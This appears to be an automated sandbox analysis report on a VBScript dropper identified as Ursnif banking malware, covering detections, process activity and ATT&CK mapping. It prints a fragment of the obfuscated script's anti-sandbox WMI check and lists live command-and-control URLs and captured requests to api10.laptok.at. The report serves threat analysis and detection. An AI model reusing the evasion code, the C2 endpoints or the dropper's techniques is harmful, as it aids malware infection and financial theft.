Loading ...

Play interactive tourEdit tour

Analysis Report 1kbvLMAjCYsO.vbs

Overview

General Information

Sample Name:1kbvLMAjCYsO.vbs
Analysis ID:288966
MD5:9c63af8add415e5807e056340945dd2a
SHA1:13f4d966b5feb389b8ae585684bf0461d457def8
SHA256:4df230ac74c4fd13cc15a9cc91f9161891c7bf7c85c136f9341bb0c4967ed7dd
Tags:goziisfbursnifvbs

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 7004 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1kbvLMAjCYsO.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 2476 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6636 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2476 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.334705066.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.334655275.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.334682946.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.334631221.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.334538278.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 3 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://api10.laptok.at/api1/FYO7_2FKxkm8/uurQvPdNJlE/P19HL4pn1dqitw/55ZSMV4adv_2B5Ay6UjuZ/l97FGy95dGHmoHce/l4SgQPbNVAeDWq_/2FjKn4vYtXX99SXqbz/PcSTmrsfV/kBO6XIsqlMTunmTuDz0l/h2m475ZFAo9lrUtuzP3/2cML7QpMj2MF1rpKg2ujUu/GH3i35drj9cMm/_2BkuAQz/eHnwCGQGHnwJ1wY4o1yPpoy/WOktQ3Mr0v/7kpSg4oFS9JcOPX_2/FjCZHPIjQja6/k5_0A_0DiQ6/8ElOYZGEuQaMiw/bKYUWqovE0RpzdxL8vF0G/7nQLs3MSrj_2B7JG/2Sdi7NZR0LEnK7R/2Avira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/FYO7_2FKxkm8/uurQvPdNJlE/P19HL4pn1dqitw/55ZSMV4adv_2B5Ay6UjuZ/l97FGy95dGAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: Joe Sandbox ViewIP Address: 8.208.101.13 8.208.101.13
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/FYO7_2FKxkm8/uurQvPdNJlE/P19HL4pn1dqitw/55ZSMV4adv_2B5Ay6UjuZ/l97FGy95dGHmoHce/l4SgQPbNVAeDWq_/2FjKn4vYtXX99SXqbz/PcSTmrsfV/kBO6XIsqlMTunmTuDz0l/h2m475ZFAo9lrUtuzP3/2cML7QpMj2MF1rpKg2ujUu/GH3i35drj9cMm/_2BkuAQz/eHnwCGQGHnwJ1wY4o1yPpoy/WOktQ3Mr0v/7kpSg4oFS9JcOPX_2/FjCZHPIjQja6/k5_0A_0DiQ6/8ElOYZGEuQaMiw/bKYUWqovE0RpzdxL8vF0G/7nQLs3MSrj_2B7JG/2Sdi7NZR0LEnK7R/2 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/5XybQwQNd8oBAHxU0m2/j8H3VNb_2Ber6K838LOY2_/2FenssEHUj_2F/HT_2Bjmq/Ckpz_2FBaz1JI09g9DIRlmv/sckmjaXngU/ctTopsobMLxS6YTiO/nlyX822q4MCP/TKUHgO8FxBp/ma3akXo5IEZaT1/HgIMlXPPfjTnbe9xjuU_2/FBhdjpIf_2FBkAI9/NcRxOgLr_2BuYh2/X8hNL9yPRy6MQlgI6Z/_2FzFpeoM/GwgrTTJHNxyFLJ4Rs6CT/rYzSfC0_2B5869cnoOa/R2XuW_0A_0D89tMvLP_2Bq/sqzTyETCgqcBK/_2BJjV_2/BGN0iayw_2Fj5szY5fNpCrM/rXruLZtiS0aTeV/PzIE_2Ba/v HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2d83d6f3,0x01d691c2</date><accdate>0x2d83d6f3,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2d83d6f3,0x01d691c2</date><accdate>0x2d83d6f3,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2d889baa,0x01d691c2</date><accdate>0x2d889baa,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2d889baa,0x01d691c2</date><accdate>0x2d889baa,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2d8afe1d,0x01d691c2</date><accdate>0x2d8afe1d,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2d8afe1d,0x01d691c2</date><accdate>0x2d8afe1d,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Sep 2020 06:56:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {56838201-FDB5-11EA-90E3-ECF4BB570DC9}.dat.18.drString found in binary or memory: http://api10.laptok.at/api1/FYO7_2FKxkm8/uurQvPdNJlE/P19HL4pn1dqitw/55ZSMV4adv_2B5Ay6UjuZ/l97FGy95dG
            Source: msapplication.xml.18.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.18.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.18.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.18.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.18.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.18.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.18.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.18.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.334705066.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334655275.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334682946.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334631221.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334538278.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334724559.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334586327.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334502845.0000000005768000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.334705066.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334655275.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334682946.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334631221.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334538278.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334724559.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334586327.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334502845.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: 1kbvLMAjCYsO.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal96.troj.evad.winVBS@4/31@4/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1kbvLMAjCYsO.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1kbvLMAjCYsO.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2476 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2476 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: 1kbvLMAjCYsO.vbsStatic file information: File size 1444713 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: e:\5\Skin\like\Picture\experiment\2\Atom\69\89\21\Good\65\string\35\our\wood.pdb source: plush.aaf.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(237605410)) > 0 And BsOfN = 0) ThenExit FunctionEnd IfSet tappa956 = GetObject("winmgmts:\\.\root\cimv2")REM pussy osseous electret vulture. Gavin Fahrenheit osteopathy Lusaka sanderling frambesia lesson damage Arden complaisant628 incontrollable shoddy bullish exorbitant686 petroleum elution Galway Formosa Berea Christiana matriarchal tarpon rabbet chamois buttress, abc340 hippopotamus430 beheld holeable copperas ethyl625 monster389 Rowena. appellant766 contort9 Set sthoBjlItems = tappa956.ExecQuery("Select * from Win32_ComputerSystem")For Each Martinson609 In sthoBjlItemsGvjlw = Gvjlw + Int((Martinson609.TotalPhysicalMemory) / ((((47 - 4.0) + 1056917.0) - 75.0) - 8309.0))NextIf Gvjlw < (((16 + 48.0) + (69 + 956.0)) - 59.0) ThenREM laughter spot Norway977 proclamation anteater bateau polysemous collaborate stun Barnes hotbox Kenton596 compilation Paulson rollick mignon philharmonic. minus lactose stamen weak424 allele compulsive mine delta polariton familiar cadmium chalice regatta nanosecond begotten rackety propulsion, Decatur cortege uppermost Boylston heaven decedent bruise topgallant plug187 infighting, disputant strum vista. infestation. similitude confiscable interrogatory, afterbirth abdicate Vassar sphere degumming655 registrant618 mortise, hell eyewitness snuff triphammer485 rescue835 gal903. mesenteric handspike tetrahedral trainee retaliatory rightward. haddock cheesecake depletion Caucasus commendation epidemiology780 debarring sheepskin Augustus flammable butane soundproof foamflower224. fable transgressor337 module783 seduction butler bison barbell grievance snappish528, 6059021 chalkline. Johansen Yates labour369 downstairs Vinson552 inappreciable hypertensive Araby131 ' Ernest chromatography leper730 mustache weather59, 352238 bituminous nipple dish oily dunk mire Huntley ballerina commensal hooligan, dynasty hale, Mao, dusty Handel cruelty myocardial slender potatoes buffet oxide Felix anemone Koenig annihilate Neapolitan8, 1914799 kinkajou quintessence Gunther Normandy handpicked nebula973 meal208. shoreline Felice909. Susie Swanson switchman pupal justify prosecution Hickman bootleg treat florin skipjack587 WAC Ill below dormant workday triangular errant, estrogen allege miniature. Blanche emigrate thereabouts coyly pander642 trample shameful labial curtail. 2837715 Mesozoic hence67 Emory, endure libel hearth fatty sweeten pelican botulism829 doorstep horrible blond ignoble980End IfREM melodious jetliner solvate tailwind tussock franc hermeneutic checkbook650 wig prove Clara conceive Janeiro bellicose doorbell hoc sanguinary headstone McCallum855 cowhand municipal Zeiss hoofmark, Spaulding befog Haas where970 insensible yipping abbe inclination Zaire moisture aorta823 puissant arsenate phon shuck eye pitch Oberlin otiose jewelry, 8224403 REM machine militarism15 rigid pinnacle monitory dwindle creekside cockleshell, 4591467 Wallis, emulsion977 katydid Caribbean731 deplete710 apropos bimonthly ag

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\plush.aafJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\plush.aafJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.334705066.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334655275.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334682946.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334631221.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334538278.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334724559.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334586327.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334502845.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\1kbvlmajcyso.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\plush.aafJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 160Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: wscript.exe, 00000000.00000003.202227828.000001AA75925000.00000004.00000001.sdmpBinary or memory string: dulemyVMCI
            Source: wscript.exe, 00000000.00000003.202227828.000001AA75925000.00000004.00000001.sdmpBinary or memory string: myVMCI

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: plush.aaf.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Huber.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.334705066.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334655275.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334682946.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334631221.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334538278.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334724559.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334586327.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334502845.0000000005768000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.334705066.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334655275.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334682946.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334631221.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334538278.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334724559.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334586327.0000000005768000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.334502845.0000000005768000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection1Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery124SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.